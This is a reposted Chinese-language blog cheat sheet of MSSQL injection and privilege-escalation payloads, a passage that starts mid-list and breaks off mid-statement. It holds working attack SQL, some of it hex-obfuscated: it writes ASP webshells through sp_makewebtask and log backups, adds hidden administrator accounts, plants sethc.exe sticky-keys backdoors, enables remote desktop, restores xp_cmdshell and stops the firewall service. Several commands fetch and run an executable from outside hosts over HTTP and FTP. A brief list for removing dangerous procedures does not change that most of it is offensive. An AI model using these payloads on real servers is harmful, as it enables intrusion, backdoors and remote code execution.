七、 ---------------------- -----写一句话***http://www.nuanyue.com---------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdeclare">www.nuanyue.com----- ---------------------- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx declare @s nvarchar(4000);select @s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200610022002900290025003e000d000a002700;exec sp_makewebtask 0x43003a005c007a00770065006c006c002e00610073007000, @s;-- and% 1=1 在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds \bake.asp,'%20select%20''< %25execute(request("a"))%25>''%20';--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
八、
----------------------
---SA沙盒模式提权-----
----------------------
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
1、exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
2、Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user itpro gmasfm /add")');
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
九、
--------------------
-----另类SA提权-----
--------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2、declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
1、declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
DECLARE @o int
DECLARE @z int
EXEC sp_OACreate 'Shell.Users',@o OUT
EXEC sp_OAMethod @o, 'Create', @z OUT, 'test'
EXEC sp_OASetProperty @z, 'setting', 3 , 'AccountType'
EXEC sp_OAMethod @z, 'ChangePassword',NULL , '123456', ''
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十、
--------------
--导出注册表--
--------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、drop table [regdir];create table [regdir](value nvarchar(1000) null,data nvarchar(1000) null)--
2、delete [regdir];insert [regdir]exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十一、
----------------
---下载程序http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1">www.nuanyue.com-----
----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
1、declare @b varbinary(8000),@hr int,@http int,@down int exec sp_oacreate [microsoft.xmlhttp],@http output exec @hr = sp_oamethod @http,[open],null,[get],[http://192.168.1.6:800/wwwroot.rar],0 exec @hr = sp_oamethod @http,[send],null exec @hr=sp_oagetproperty @http,[responsebody],@b output exec @hr=sp_oacreate [adodb.stream],@down output exec @hr=sp_oasetproperty @down,[type],1 exec @hr=sp_oasetproperty @down,[mode],3 exec @hr=sp_oamethod @down,[open],null exec @hr=sp_oamethod @down,[write],null,@b exec @hr=sp_oamethod @down,[savetofile],null,[c:/a.exe],1 ;-- and 1=1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十二、
-----------------
-Log备份WebShellhttp://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com-
-----------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
alter database master set RECOVERY FULL
create table cmd (a p_w_picpath)--
backup log master to disk = 'c:\cmd' with init
insert into cmd (a) values ('< %eval(request("a")):response.end%>')--
backup log master to disk = 'C:\Inetpub\wwwroot\ri3.asp'--
drop table cmd--
2\
use mir
alter database mir set RECOVERY FULL --
create table cmd8 (a p_w_picpath)--
backup log mir to disk = 'c:\cmd8' with init --
insert into cmd8 (a) values ('< %eval(request("a")):response.end%>')--
backup log mir to disk = 'c:\backup.asp'--
drop table cmd8--
alter database mir set RECOVERY SIMPLE --
3\
create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[p_w_picpath])--
declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name(),@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--
insert/**/into/**/[shit_tmp](cmd)/**/values(0x3C256576616C28726571756573742822612229293A726573706F6E73652E656E64253E)--
select/**/@s=0x63003a005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk=@s/**/with/**/init,no_truncate--
Drop/**/table/**/[shit_tmp]--
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
十三、
-------------------------------
--创建sp_readtextfile存储过程http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com--
-------------------------------
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
exec ('bulk insert #tempfile from "' + @filename + '"') select * from #tempfile drop table #tempfile End go xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 十四、开3389http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com =================================================================== declare @a varchar(255),@b varchar(255); set @a=0x6D61737465722E64626F2E78705F636D647368656C6C; set @b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031; exec @a @b =================================================================== 我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml ----------------- ---读取文件内容-- ----------------- exec sp_readTextFile 'c:\boot.ini' xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe' ----------------------- ---清除MsSql日志http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com------- ----------------------- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx set nocount on declare @logicalfilename sysname, @maxminutes int, @newsize int xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ---------------------- --停掉或激活某个服务-- ---------------------- exec master..xp_servicecontrol 'stop','sharedaccess' exec master..xp_servicecontrol 'start','sharedaccess' -------------------- --列出驱动器的名称http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com-- -------------------- EXEC [master].[dbo].[xp_availablemedia] ---------------------------------- --列出指定目录的所有下一级子目录-- ---------------------------------- EXEC [master].[dbo].[xp_subdirs] 'c:\windows' ------------------------------ --列出当前错误日志的具体内容-- ------------------------------ EXEC [master].[dbo].[xp_readerrorlog] ---------------------- --列出当前计算机名称-- ---------------------- execute master..xp_getnetname -------------------------------- -列出当前计算机的驱动器可用空间- -------------------------------- execute master..xp_fixeddrives ======================== ==列出服务器所有本地组== ======================== execute master..xp_enumgroups ====================== ==获取MS SQL的版本号== ====================== execute master..sp_msgetversion ========================================= ==参数说明:目录名,目录深度,是否显示文件== ========================================= execute master..xp_dirtree 'c:' execute master..xp_dirtree 'c:',1 execute master..xp_dirtree 'c:',1,1 ========================================= ==列出服务器上安装的所有OLEDB提供的程序== ========================================= execute master..xp_enum_oledb_providers ========================= ==列出服务器上配置的DNS== ========================= execute master..xp_enumdsn 删除存储过程 drop PROCEDURE sp_addextendedproc ----------------------- --删除sql危险存储过程-- ----------------------- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx DROP PROCEDURE sp_makewebtask exec master..sp_dropextendedproc xp_cmdshell exec master..sp_dropextendedproc xp_dirtree exec master..sp_dropextendedproc xp_fileexist exec master..sp_dropextendedproc xp_terminate_process exec master..sp_dropextendedproc sp_oamethod exec master..sp_dropextendedproc sp_oacreate exec master..sp_dropextendedproc xp_regaddmultistring exec master..sp_dropextendedproc xp_regdeletekey exec master..sp_dropextendedproc xp_regdeletevalue exec master..sp_dropextendedproc xp_regenumkeys exec master..sp_dropextendedproc xp_regenumvalues exec master..sp_dropextendedproc sp_add_job exec master..sp_dropextendedproc sp_addtask exec master..sp_dropextendedproc xp_regread exec master..sp_dropextendedproc xp_regwrite exec master..sp_dropextendedproc xp_readwebtask exec master..sp_dropextendedproc xp_makewebtask exec master..sp_dropextendedproc xp_regremovemultistring exec master..sp_dropextendedproc sp_OACreate DROP PROCEDURE sp_addextendedproc xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xp_cmdshell新的恢复办法 扩展储存过程被删除以后可以有很简单的办法恢复: 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell
读3389端口
regedit /e port.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
然后 type port.reg | find "PortNumber"
sql 语句
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
declare @s varchar(4000) set @s=cast(0x65786563206D61737465722E2E78705F726567726561642027484B45595F4C4F43414C5F4D414348494E45272C2753595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D546370272C27506F72744E756D62657227 as varchar(4000));exec(@s); --
开启2003的终端(sa)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server', 'fDenyTSConnections','REG_DWORD','0'
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
映象劫持http://www.nuanyue.com---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1/">www.nuanyue.com exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';-- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','';-- REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f 建立用户1-这里默认用户是Reconditeness密码9527可自行修改 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")') select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net1 user Reconditeness 9527 /ad &net localgroup administrators terks /ad")') win2K直接上PS马 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")') win03-XP直接上PS马 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c @echo open 60.190.176.85>>net.txt&@echo reconditeness>>net.txt&@echo 7259>>net.txt&@echo get 0.exe>>net.txt&@echo bye>>net.txt&@ftp -s:net.txt&del net.txt & 0.exe")') .终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user dell huxifeng007 /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators dell /add' xp或2003server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user dell huxifeng007 /add' declare @sh
转载于:https://blog.51cto.com/obnus/472595
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
